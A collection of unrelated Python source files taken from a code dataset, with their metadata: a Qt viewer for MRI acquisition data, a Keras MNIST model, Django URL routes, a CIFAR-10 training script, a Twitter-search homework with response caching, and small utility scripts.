normalized_text\n","sub_path":"tf_idf_normalization.py","file_name":"tf_idf_normalization.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"240556532","text":"import logging\n\nfrom PySide2 import QtWidgets, QtCore, QtGui\nfrom PySide2.QtCore import Qt\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.figure as figure\nfrom matplotlib.backends.backend_qt5agg import FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nfrom .utils import CachedDataset\n\nacquisition_header_fields = [\n ('version', 'Version', \"ISMRMRD Version\"),\n ('flags', 'Flags', \"Acquisition flags bitfield.\"),\n ('measurement_uid', 'UID', \"Unique ID for the measurement.\"),\n ('scan_counter', 'Scan Counter', \"Current acquisition number in the measurement.\"),\n ('idx.kspace_encode_step_1', 'Encode Step1', \"Encoding Counters\"),\n ('idx.kspace_encode_step_2', 'Encode Step2', \"Encoding Counters\"),\n ('idx.average', 'Average', \"Encoding Counters\"),\n ('idx.slice', 'Slice', \"Encoding Counters\"),\n ('idx.contrast', 'Contrast', \"Encoding Counters\"),\n ('idx.phase', 'Phase', \"Encoding Counters\"),\n ('idx.repetition', 'Repetition', \"Encoding Counters\"),\n ('idx.set', 'Set', \"Encoding Counters\"),\n ('idx.segment', 'Segment', \"Encoding Counters\"), ('acquisition_time_stamp', 'Acquisition Timestamp', \"Acquisition Timestamp\"),\n ('physiology_time_stamp', 'Physiology Timestamps', \"Physiology Timestamps (e.g. ecg, breathing, etc.)\"),\n ('number_of_samples', 'Samples', \"Number of samples acquired.\"),\n ('available_channels', 'Available Channels', \"Number of available channels.\"),\n ('active_channels', 'Active Channels', \"Number of channels currently active.\"),\n ('channel_mask', 'Channel Mask', \"A binary mask indicating which channels are active.\"),\n ('discard_pre', 'Prefix Discard', \"Samples to be discarded at the beginning of the acquisition.\"),\n ('discard_post', 'Postfix Discard', \"Samples to be discarded at the end of the acquisition.\"),\n ('center_sample', 'Center Sample', \"Sample at the center of k-space.\"),\n ('encoding_space_ref', 'Encoding Space', \"Acquisition encoding space reference.\"),\n ('trajectory_dimensions', 'Trajectory Dimensions', \"Dimensionality of the trajectory vector.\"),\n ('sample_time_us', 'Sample Time', \"Time between samples (in microseconds), sampling BW.\"),\n ('position', 'Position', \"Three-dimensional spacial offsets from isocenter.\"),\n ('read_dir', 'Read Direction', \"Directional cosines of the readout/frequency encoding.\"),\n ('phase_dir', 'Phase Direction', \"Directional cosines of the phase.\"),\n ('slice_dir', 'Slice Direction', \"Directional cosines of the slice direction.\"),\n ('patient_table_position', 'Patient Table', \"Patient table off-center.\"),\n ('idx.user', 'User Idx', \"Encoding Counters\"),\n ('user_int', 'User Integers', \"Free user parameters.\"),\n ('user_float', 'User Floats', \"Free user parameters.\")\n]\n\n\n\nclass AcquisitionModel(QtCore.QAbstractTableModel):\n\n def __init__(self, container):\n super().__init__()\n self.acquisitions = CachedDataset(container.acquisitions)\n\n self.data_handlers = {\n 'idx.kspace_encode_step_1': self.__encoding_counters_handler,\n 'idx.kspace_encode_step_2': self.__encoding_counters_handler,\n 'idx.average': self.__encoding_counters_handler,\n 'idx.slice': self.__encoding_counters_handler,\n 
'idx.contrast': self.__encoding_counters_handler,\n 'idx.phase': self.__encoding_counters_handler,\n 'idx.repetition': self.__encoding_counters_handler,\n 'idx.set': self.__encoding_counters_handler,\n 'idx.segment': self.__encoding_counters_handler,\n 'idx.user': self.__user_encoding_counters_handler,\n 'physiology_time_stamp': self.__array_handler,\n 'channel_mask': self.__array_handler,\n 'position': self.__array_handler,\n 'read_dir': self.__array_handler,\n 'phase_dir': self.__array_handler,\n 'slice_dir': self.__array_handler,\n 'patient_table_position': self.__array_handler,\n 'user_int': self.__array_handler,\n 'user_float': self.__array_handler\n }\n\n def rowCount(self, _=None):\n return len(self.acquisitions)\n\n def columnCount(self, _=None):\n return len(acquisition_header_fields)\n\n def headerData(self, section, orientation, role=Qt.DisplayRole):\n\n if orientation == Qt.Orientation.Vertical:\n return None\n\n _, header, tooltip = acquisition_header_fields[section]\n\n if role == Qt.DisplayRole:\n return header\n if role == Qt.ToolTipRole:\n return tooltip\n\n return None\n\n def data(self, index, role=Qt.DisplayRole):\n attribute, _, tooltip = acquisition_header_fields[index.column()]\n\n if role == Qt.DisplayRole:\n acquisition = self.acquisitions[index.row()]\n handler = self.data_handlers.get(attribute, lambda acq, attr: getattr(acq, attr))\n return handler(acquisition, attribute)\n if role == Qt.ToolTipRole:\n return tooltip\n\n return None\n\n def num_coils(self):\n return self.acquisitions[0].active_channels\n\n def __array_handler(self, acquisition,attribute):\n array = getattr(acquisition,attribute)\n return ', '.join([str(item) for item in array])\n\n @staticmethod\n def __encoding_counters_handler(acquisition, attribute):\n return getattr(acquisition.idx,attribute[4:])\n\n @staticmethod\n def __user_encoding_counters_handler(acquisition, attribute):\n array = getattr(acquisition.idx, attribute[4:])\n return ', '.join([str(item) for item in array])\n\n\nclass AcquisitionTable(QtWidgets.QTableView):\n selection_changed = QtCore.Signal()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def selectionChanged(self, selected, deselected):\n super().selectionChanged(selected, deselected)\n\n self.selection_changed.emit()\n\n\nclass AcquisitionControlGUI(QtWidgets.QWidget):\n\n def __init__(self,num_channels):\n super().__init__()\n layout = QtWidgets.QHBoxLayout()\n self.data_processing = QtWidgets.QComboBox()\n self.data_processing.addItem(\"Mag./Phase\", userData={\"names\": (\"Magnitude\", \"Phase\"),\n \"transform\": lambda x: (np.abs(x), np.angle(x))})\n self.data_processing.addItem(\"Real/Imag\", userData={\"names\": (\"Real\", \"Imag.\"),\n \"transform\": lambda x: (np.real(x), np.imag(x))})\n layout.addWidget(self.data_processing)\n\n self.channel_selector = QtWidgets.QComboBox()\n self.__set_num_channels(num_channels)\n layout.addWidget(self.channel_selector)\n\n self.setLayout(layout)\n\n def __set_num_channels(self, num_channels):\n for i in range(self.channel_selector.count()):\n self.channel_selector.removeItem(i)\n\n for idx in range(num_channels):\n self.channel_selector.addItem(\"Channel \" + str(idx), userData={\"selector\": lambda x, i=idx : x[:, i:i + 1],\n \"labeler\": lambda scan, coil: str(scan)})\n\n self.channel_selector.addItem(\"All Channels\", userData={\"selector\": lambda x: x,\n \"labeler\": lambda scan, coil: str((scan, coil))})\n\n def label(self, scan, coil):\n return 
self.channel_selector.currentData()[\"labeler\"](scan, coil)\n\n def axes_titles(self):\n return self.data_processing.currentData()[\"names\"]\n\n def transform_acquisition(self, acq):\n return self.data_processing.currentData()[\"transform\"](self.channel_selector.currentData()[\"selector\"](acq))\n\n\nclass AcquisitionPlotter(FigureCanvas):\n\n def __init__(self):\n\n self.figure = mpl.figure.Figure()\n self.axis = self.figure.subplots(2, 1, sharex='col')\n self.figure.subplots_adjust(hspace=0)\n\n self.legend = mpl.legend.Legend(self.figure, [], [])\n self.figure.legends.append(self.legend)\n super().__init__(self.figure)\n\n def clear(self):\n for ax in self.axis:\n ax.clear()\n\n def plot(self, acquisitions, formatter, labeler):\n\n for acquisition in acquisitions:\n acquisition1, acquisition2 = formatter(acquisition)\n x_step = acquisition.sample_time_us\n x_scale = np.arange(0, acquisition1.shape[0] * x_step, x_step)\n for coil, acq1 in enumerate(acquisition1.T):\n self.axis[0].plot(x_scale, acq1, label=labeler(acquisition.scan_counter, coil))\n self.axis[1].plot(x_scale, acquisition2)\n\n handles, labels = self.axis[0].get_legend_handles_labels()\n self.legend = mpl.legend.Legend(self.figure, handles, labels)\n self.figure.legends[0] = self.legend\n\n self.figure.canvas.draw()\n\n def set_titles(self, titles):\n for ax, title in zip(self.axis, titles):\n ax.set_title(title, loc=\"right\", pad=-10)\n\n\nclass AcquisitionViewer(QtWidgets.QSplitter):\n\n def __init__(self, container):\n super().__init__()\n\n self.model = AcquisitionModel(container)\n\n self.acquisitions = AcquisitionTable(self)\n self.acquisitions.setModel(self.model)\n self.acquisitions.setAlternatingRowColors(True)\n self.acquisitions.resizeColumnsToContents()\n self.acquisitions.selection_changed.connect(self.selection_changed)\n self.acquisitions.pressed.connect(self.mouse_clicked)\n\n self.setOrientation(Qt.Vertical)\n\n self.canvas = AcquisitionPlotter()\n\n self.bottom_view = QtWidgets.QSplitter()\n self.acquisition_gui = AcquisitionControlGUI(self.model.num_coils())\n self.bottom_view.addWidget(self.acquisition_gui)\n self.acquisition_gui.data_processing.currentIndexChanged.connect(self.selection_changed)\n self.acquisition_gui.channel_selector.currentIndexChanged.connect(self.selection_changed)\n\n self.addWidget(self.acquisitions)\n self.addWidget(self.canvas)\n self.addWidget(self.bottom_view)\n\n self.navigation_toolbar = NavigationToolbar(self.canvas, self.bottom_view)\n self.bottom_view.addWidget(self.navigation_toolbar)\n\n self.setStretchFactor(0, 6)\n self.setStretchFactor(1, 1)\n\n def table_clicked(self, index):\n acquisition = self.model.acquisitions[index.row()]\n self.plot([acquisition])\n\n def format_data(self, acq):\n return self.acquisition_gui.transform_acquisition(acq.data.T)\n\n def selection_changed(self):\n self.canvas.clear()\n self.canvas.set_titles(self.acquisition_gui.axes_titles())\n\n indices = set([idx.row() for idx in self.acquisitions.selectedIndexes()])\n acquisitions = [self.model.acquisitions[idx] for idx in\n indices]\n self.canvas.plot(acquisitions, self.format_data, self.acquisition_gui.label)\n\n def mouse_clicked(self, index):\n if not QtGui.QGuiApplication.mouseButtons() & Qt.RightButton:\n return\n menu = QtWidgets.QMenu(self)\n DeleteAction = QtWidgets.QAction('Delete', self)\n y = index.column()\n DeleteAction.triggered.connect(lambda: self.acquisitions.hideColumn(y))\n menu.addAction(DeleteAction)\n menu.popup(QtGui.QCursor.pos())\n\n # SortAction = 
QtWidgets.QAction('Sort', self)\n # menu.addAction(SortAction)\n","sub_path":"ismrmrdviewer/viewer/AcquisitionViewer.py","file_name":"AcquisitionViewer.py","file_ext":"py","file_size_in_byte":11575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"33541207","text":"\"\"\"Finds the first ten digits of the sum of the following one-hundred 50-digit numbers.\"\"\"\n\ncounter = 0\nwith open(\"input.txt\",\"r\") as f:\n for line in f:\n counter += int(line.strip(\"\\n\"))\n\nprint(str(counter)[0:10])\n","sub_path":"ProjectEuler/Problem13/large_sum.py","file_name":"large_sum.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131844225","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 15 13:06:13 2017\n\n@author: hasnat\nPurpose: Implementation of CNN model from caffe-face for MNIST classification.\nhttps://github.com/ydwen/caffe-face/tree/caffe-face/mnist_example\n\"\"\"\n\nfrom keras.models import Model, Input\nfrom keras.layers import Dense, Dropout, Flatten, Lambda\nfrom keras.layers import Conv2D, MaxPooling2D, PReLU\nfrom keras import backend as K\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import SGD\nfrom keras.regularizers import l2 # L2-regularisation\nfrom keras.utils import np_utils\nfrom keras.utils.io_utils import HDF5Matrix\nfrom keras.initializers import RandomNormal, Constant\n\nimport numpy as np\n\ndef do_conv_act(x, n_op, k_size, st_size, input_shape=None, k_init='glorot_uniform', k_reg=None, bias_use=True, padtype='same'): \n # Convolution\n if input_shape is not None:\n x = Conv2D(n_op, kernel_size=(k_size, k_size), strides=(st_size, st_size), \n padding=padtype, input_shape=input_shape, use_bias=bias_use, \n kernel_initializer=k_init, kernel_regularizer=k_reg)(x)\n else:\n x = Conv2D(n_op, kernel_size=(k_size, k_size), strides=(st_size, st_size), \n padding=padtype, use_bias=bias_use,\n kernel_initializer=k_init, kernel_regularizer=k_reg)(x)\n \n # Nonlinear activation\n x = PReLU()(x)\n \n return x\n\ndef do_pool(x, sz):\n return MaxPooling2D(pool_size=(sz, sz))(x)\n\ndef rn_(stdval):\n # RandomNormal's first positional argument is the mean, so the spread is passed as stddev\n return RandomNormal(stddev=stdval)\n\nbatch_size = 100\nnb_classes = 10\nepochs = 6\n\nnumTrSamp = 60000\n# numTrSamp = 500\nnumSampToLoadOnce = batch_size*200\ngl_wd = 0.0005\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\npath_train = 'mnist_train.h5'\nX_test = HDF5Matrix('mnist_test.h5', 'X')\nY_test = HDF5Matrix('mnist_test.h5', 'y')\nY_labels = np.asarray(Y_test) \n# input image dimensions\nimg_rows = X_test.shape[1]\nimg_cols = X_test.shape[2]\n\ninput_shape = (img_rows, img_cols, 1)\n\nX_test = (np.asarray(X_test, dtype='float32') - 127.5) * 0.0078125 \nX_test = np.expand_dims(X_test, 3)\nY_test = np_utils.to_categorical(Y_test, nb_classes)\n\n# Define Model \nimg_input = Input(shape=input_shape)\n\nc1 = do_conv_act(img_input, 32, k_size=5, st_size=1, input_shape=input_shape, k_reg=l2(gl_wd), padtype='same')\nc2 = do_conv_act(c1, 32, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\np1 = do_pool(c2, 2)\n\nc3 = do_conv_act(p1, 64, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\nc4 = do_conv_act(c3, 64, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\np2 = do_pool(c4, 2)\n\nc5 = do_conv_act(p2, 128, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\nc6 = do_conv_act(c5, 128, 
k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\np3 = do_pool(c6, 2)\n\nflat = Flatten()(p3)\n\nfc1 = Dense(3, kernel_regularizer=l2(gl_wd), use_bias=False)(flat)\nact_1 = PReLU()(fc1)\n\nbn1 = BatchNormalization()(act_1)\nl2_fc1 = Lambda(lambda x: K.l2_normalize(x, axis=1))(bn1)\nscale_l2 = Lambda(lambda x: x*1)(l2_fc1)\n \nfc_cl = Dense(nb_classes, activation='softmax')(scale_l2)\n\nmodel = Model(inputs=img_input, outputs = fc_cl)\n\n# Set the optimizer\nsgd = SGD(lr=0.01, decay=0, momentum=0.9, nesterov=False)\n\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n\nmodel.summary()\n\n\n# Start training \nmulsteplr = [3, 5, 7]\nmulstepCnt = 0\nfor j in range(max(mulsteplr)):\n#for j in range(epochs): \n st = 0\n ed = st + numSampToLoadOnce\n \n while st < numTrSamp:\n print('== Global Epoch: '+ str(j) +' , LR:: '+ str(K.get_value(sgd.lr)) + ' ==')\n if ed>numTrSamp:\n ed = numTrSamp\n \n if(ed-st < batch_size):\n st = ed-1\n continue\n\n print('Data extracting from big matrix ...')\n X_train = HDF5Matrix(path_train, 'X', start=st, end=ed)\n Y_train = HDF5Matrix(path_train, 'y', start=st, end=ed) \n\n # Preprocess data\n X_train = (np.asarray(X_train, dtype='float32') - 127.5) * 0.0078125 \n X_train = np.expand_dims(X_train, 3)\n Y_train = np_utils.to_categorical(Y_train, nb_classes)\n \n print('Fitting model ...')\n model.fit(X_train, Y_train, batch_size=batch_size, shuffle='batch', nb_epoch=1, verbose=1, validation_data=(X_test, Y_test))\n \n # update indices\n st = ed\n ed = st + numSampToLoadOnce \n \n # decrease learning rate\n if(j>=mulsteplr[mulstepCnt]):\n print(str(j) + ':: Decreasing learning rate')\n K.set_value(sgd.lr, 0.8 * K.get_value(sgd.lr))\n mulstepCnt = mulstepCnt + 1\n \n submodel = Model(inputs=img_input, outputs = l2_fc1) \n points3D = submodel.predict(X_test)\n np.savez('points3D_l2sm_'+str(j), X=points3D, y=Y_labels)","sub_path":"cnn/keras_mnist_mod.py","file_name":"keras_mnist_mod.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"495285227","text":"from django.conf.urls import url, include\nfrom myproject.core import views as c\n\ncustomer_patterns = [\n url(r'^$', c.customer_list, name='customer_list'),\n url(r'^add/$', c.customer_add, name='customer_add'),\n url(r'^save/$', c.customer_save, name='customer_save'),\n]\n\nperson_patterns = [\n url(r'^$', c.person_list, name='person_list'),\n url(r'^add/$', c.person_create, name='person_add'),\n]\n\nurlpatterns = [\n url(r'^$', c.home, name='home'),\n url(r'^customer/', include(customer_patterns)),\n url(r'^person/', include(person_patterns)),\n]\n","sub_path":"myproject/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"434234684","text":"import logging\nimport os\nimport sys\nfrom argparse import ArgumentParser\nfrom collections import OrderedDict\n\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nimport torch.nn.functional as F\nimport torch.utils.data\nfrom mmcv import Config\nfrom mmcv.runner import Runner, DistSamplerSeedHook\nfrom torch.nn.parallel import DataParallel, DistributedDataParallel\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torchvision import datasets, transforms\n\nimport custom_datasets\nimport models.custom\nimport 
models.mobilenet\nimport models.mobilenetv2\nimport models.resnet_cifar\nimport models.wide_resnet\n\nimport mmcv\nimport os.path as osp\nimport shutil\n\n\ndef deep_recursive_obj_from_dict(info):\n    \"\"\"Initialize an object from dict.\n\n    The dict must contain the key \"type\", which indicates the object type, it\n    can be either a string or type, such as \"list\" or ``list``. Remaining\n    fields are treated as the arguments for constructing the object.\n\n    Args:\n        info (dict): Object types and arguments.\n\n    Returns:\n        any type: Object built from the dict.\n    \"\"\"\n    assert isinstance(info, dict) and 'type' in info\n    # TODO: This does not support object dicts nested in non-object dicts.\n    args = info.copy()\n    obj_type = args.pop('type')\n    if mmcv.is_str(obj_type):\n        if obj_type in sys.modules:\n            obj_type = sys.modules[obj_type]\n        else:\n            # Assume the last part is a function/member name.\n            elems = obj_type.split('.')\n            module, attr = '.'.join(elems[:-1]), elems[-1]\n            obj_type = getattr(sys.modules[module], attr)\n    elif not isinstance(obj_type, type):\n        raise TypeError('type must be a str or valid type, but got {}'.format(\n            type(obj_type)))\n    evaluated_args = {}\n    for argname, argval in args.items():\n        if isinstance(argval, dict) and 'type' in argval:\n            evaluated_args[argname] = deep_recursive_obj_from_dict(argval)\n        elif type(argval) == list or type(argval) == tuple:\n            # Transform each dict in the list, else simply append.\n            transformed_list = []\n            for elem in argval:\n                if isinstance(elem, dict):\n                    transformed_list.append(deep_recursive_obj_from_dict(elem))\n                else:\n                    transformed_list.append(elem)\n            evaluated_args[argname] = type(argval)(transformed_list)\n        else:\n            evaluated_args[argname] = argval\n    return obj_type(**evaluated_args)\n\ndef accuracy(output, target, topk=(1, )):\n    \"\"\"Computes the precision@k for the specified values of k\"\"\"\n    with torch.no_grad():\n        maxk = max(topk)\n        batch_size = target.size(0)\n\n        _, pred = output.topk(maxk, 1, True, True)\n        pred = pred.t()\n        correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n        res = []\n        for k in topk:\n            correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n            res.append(correct_k.mul_(100.0 / batch_size))\n        return res\n\n\ndef batch_processor(model, data, train_mode):\n    img, label, logits = data\n    label = label.cuda(non_blocking=True)\n    logits = logits.cuda(non_blocking=True)\n    pred = model(img)\n    if len(logits.size()) > 1:\n        loss = F.kl_div(F.log_softmax(pred, 1), F.softmax(logits, 1))\n    else:\n        loss = F.cross_entropy(pred, label)\n    acc_top1, acc_top5 = accuracy(pred, label, topk=(1, 5))\n    log_vars = OrderedDict()\n    log_vars['loss'] = loss.item()\n    log_vars['acc_top1'] = acc_top1.item()\n    log_vars['acc_top5'] = acc_top5.item()\n    outputs = dict(loss=loss, log_vars=log_vars, num_samples=img.size(0))\n    return outputs\n\n\ndef get_logger(log_level):\n    logging.basicConfig(\n        format='%(asctime)s - %(levelname)s - %(message)s', level=log_level)\n    logger = logging.getLogger()\n    return logger\n\n\ndef init_dist(backend='nccl', **kwargs):\n    if mp.get_start_method(allow_none=True) is None:\n        mp.set_start_method('spawn')\n    rank = int(os.environ['RANK'])\n    num_gpus = torch.cuda.device_count()\n    torch.cuda.set_device(rank % num_gpus)\n    dist.init_process_group(backend=backend, **kwargs)\n\n\ndef parse_args():\n    parser = 
ArgumentParser(description='Train CIFAR-10 classification')\n parser.add_argument('config', help='train config file path')\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch'],\n default='none',\n help='job launcher')\n parser.add_argument('--local_rank', type=int, default=0)\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n cfg = Config.fromfile(args.config)\n\n logger = get_logger(cfg.log_level)\n\n # init distributed environment if necessary\n if args.launcher == 'none':\n dist = False\n logger.info('Disabled distributed training.')\n else:\n dist = True\n init_dist(**cfg.dist_params)\n world_size = torch.distributed.get_world_size()\n rank = torch.distributed.get_rank()\n if rank != 0:\n logger.setLevel('ERROR')\n logger.info('Enabled distributed training.')\n\n # build datasets and dataloaders\n train_dataset = deep_recursive_obj_from_dict(cfg.data.train)\n val_dataset = deep_recursive_obj_from_dict(cfg.data.val)\n if dist:\n num_workers = cfg.data_workers\n assert cfg.batch_size % world_size == 0\n batch_size = cfg.batch_size // world_size\n train_sampler = DistributedSampler(train_dataset, world_size, rank)\n val_sampler = DistributedSampler(val_dataset, world_size, rank)\n shuffle = False\n else:\n num_workers = cfg.data_workers * len(cfg.gpus)\n batch_size = cfg.batch_size\n train_sampler = None\n val_sampler = None\n shuffle = True\n train_loader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n sampler=train_sampler,\n num_workers=num_workers)\n val_loader = DataLoader(\n val_dataset,\n batch_size=batch_size,\n shuffle=False,\n sampler=val_sampler,\n num_workers=num_workers)\n\n # build model\n model = deep_recursive_obj_from_dict(cfg.model)\n if dist:\n model = DistributedDataParallel(\n model.cuda(), device_ids=[torch.cuda.current_device()])\n else:\n model = DataParallel(model, device_ids=cfg.gpus).cuda()\n\n # build runner and register hooks\n runner = Runner(\n model,\n batch_processor,\n cfg.optimizer,\n cfg.work_dir,\n log_level=cfg.log_level)\n runner.register_training_hooks(\n lr_config=cfg.lr_config,\n optimizer_config=cfg.optimizer_config,\n checkpoint_config=cfg.checkpoint_config,\n log_config=cfg.log_config)\n if dist:\n runner.register_hook(DistSamplerSeedHook())\n\n # load param (if necessary) and run\n if cfg.get('resume_from') is not None:\n runner.resume(cfg.resume_from)\n elif cfg.get('load_from') is not None:\n runner.load_checkpoint(cfg.load_from)\n\n # Create work_dir if necessary and copy config file.\n if mmcv.is_str(cfg.work_dir):\n work_dir = osp.abspath(cfg.work_dir)\n mmcv.mkdir_or_exist(work_dir)\n shutil.copy(args.config, work_dir)\n\n runner.run([train_loader, val_loader], cfg.workflow, cfg.total_epochs)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/train_cifar10.py","file_name":"train_cifar10.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"159320102","text":"import unittest\nimport tweepy\nimport requests\nimport json\nimport twitter_info\n\n## SI 206 - HW\n## COMMENT WITH:\n## Your section day/time: 003, Thursday 8:30-9:3-0 am\n## Any names of people you worked with on this assignment:\n\n\n## Write code that uses the tweepy library to search for tweets with three different phrases of the \n## user's choice (should use the Python input function), and prints out the Tweet text and the \n## created_at value (note that this will be in GMT time) of the first FIVE 
tweets with at least \n## 1 blank line in between each of them, e.g.\n\n\n## You should cache all of the data from this exercise in a file, and submit the cache file \n## along with your assignment. \n\n## So, for example, if you submit your assignment files, and you have already searched for tweets \n## about \"rock climbing\", when we run your code, the code should use CACHED data, and should not \n## need to make any new request to the Twitter API. But if, for instance, you have never \n## searched for \"bicycles\" before you submitted your final files, then if we enter \"bicycles\" \n## when we run your code, it _should_ make a request to the Twitter API.\n\n## Because it is dependent on user input, there are no unit tests for this -- we will \n## run your assignments in a batch to grade them!\n\n## We've provided some starter code below, like what is in the class tweepy examples.\n\n##SAMPLE OUTPUT\n## See: https://docs.google.com/a/umich.edu/document/d/1o8CWsdO2aRT7iUz9okiCHCVgU5x_FyZkabu2l9qwkf8/edit?usp=sharing\n\n\n\n## **** For extra credit, create another file called twitter_info.py that \n## contains your consumer_key, consumer_secret, access_token, and access_token_secret, \n## import that file here. Do NOT add and commit that file to a public GitHub repository.\n\n## **** If you choose not to do that, we strongly advise using authentication information \n## for an 'extra' Twitter account you make just for this class, and not your personal \n## account, because it's not ideal to share your authentication information for a real \n## account that you use frequently.\n\n## Get your secret values to authenticate to Twitter. You may replace each of these \n## with variables rather than filling in the empty strings if you choose to do the secure way \n## for EC points\nconsumer_key = twitter_info.consumer_key\nconsumer_secret = twitter_info.consumer_secret\naccess_token = twitter_info.access_token\naccess_token_secret = twitter_info.access_token_secret\n## Set up your authentication to Twitter\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n# Set up library to grab stuff from twitter with your authentication, and \n# return it in a JSON-formatted way\n\napi = tweepy.API(auth, parser=tweepy.parsers.JSONParser()) \nCACHE_FNAME = 'HW7_cache.json'\n\n## Write the rest of your code here!\n\n#### Recommended order of tasks: ####\n## 1. Set up the caching pattern start -- the dictionary and the try/except \n## \t\tstatement shown in class.\n\ntry:\n cache_file = open(CACHE_FNAME, 'r') # Try to read the data from the file\n cache_contents = cache_file.read() # If it's there, get it into a string\n CACHE_DICTION = json.loads(cache_contents) # And then load it into a dictionary\n cache_file.close() # Close the file, we're good, we got the data in a dictionary.\nexcept:\n CACHE_DICTION = {}\n\n## 2. Write a function to get twitter data that works with the caching pattern, \n## \t\tso it either gets new data or caches data, depending upon what the input \n##\t\tto search for is. 
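## Illustrative sketch of the cache-or-fetch pattern described in step 2 above (this helper is
## not part of the original assignment code). `fetch_fn` is a hypothetical callable standing in
## for the real Twitter request; CACHE_DICTION, CACHE_FNAME and json are the objects set up above.
def get_cached_or_fetch(key, fetch_fn):
	if key in CACHE_DICTION:
		# cache hit: reuse the stored data, no API request is made
		return CACHE_DICTION[key]
	# cache miss: fetch fresh data, then persist the whole cache dictionary
	result = fetch_fn()
	CACHE_DICTION[key] = result
	with open(CACHE_FNAME, "w") as cache_file:
		cache_file.write(json.dumps(CACHE_DICTION))
	return result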
\n\n#use online json viewer\ndef get_twitter_data():\n\tsearch_term = input(\"Enter Tweet term: \")\n\tword = \"twitter_{}\".format(search_term)\n\n\n\tif word in CACHE_DICTION:\n\t\tprint (\"using cache\")\n\t\ttweets = CACHE_DICTION[word]\n\telse: \n\t\tprint (\"fetching\")\n\t\t#api search of the word in the last 5 tweets\n\t\tresults = api.search(q = search_term, count = 5)\n\t\ttweets = results[\"statuses\"]\n\t\tCACHE_DICTION[word] = tweets\n\t\tf = open(CACHE_FNAME, \"w\")\n\t\t#updates the json file with whatever is in CACHE_DICTION\n\t\tf.write(json.dumps(CACHE_DICTION))\n\t\tf.close()\n\n\ttweet_results = list()\n\t#creates the list that has the tweet information\n\tfor tweet in tweets:\n\t\ttweet_results.append(\"TEXT: \" + tweet[\"text\"])\n\t\ttweet_results.append(\"CREATED AT: \" + tweet[\"created_at\"] + \"\\n\")\n\n\treturn tweet_results\n\n\t\n\n\n## 3. Using a loop, invoke your function, save the return value in a variable, and explore the \n##\t\tdata you got back!\n\n#loops three times to search for 3 different words\nfor x in range(3):\n\tdata = get_twitter_data()\n\tfor item in data:\n\t\tprint (item)\n\n\n\n\n\n\n\n\n\n","sub_path":"HW7/206_HW_Twitter.py","file_name":"206_HW_Twitter.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"304732089","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n# from keras.applications.xception import Xception\nfrom sklearn.model_selection import train_test_split\n\n\n# print(os.path.isfile('../nvidia_model.py'))\ntraining_file = '../SDC_jungle.npy'\ntraining_data = np.load(training_file, allow_pickle=True)\nfeature = []\nlabel = []\n\n# print(len(training_data), len(training_data[0]))\n\nfor item in training_data:\n    feature.append([item[0], item[1], item[2]])\n    label.append(item[3])\n\nfeature = np.asarray(feature)\nlabel = np.asarray(label)\n\nx_train, x_valid, y_train, y_valid = train_test_split(feature, label, test_size=0.2, random_state=0)\n\ncenter = x_train[0][0]\nleft = x_train[0][1]\nright = x_train[0][2]\nprint(y_train[0])\n\nplt.imshow(center)\nplt.imshow(left)\nplt.imshow(right)\nplt.show()\n\n","sub_path":"unused/testpy/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
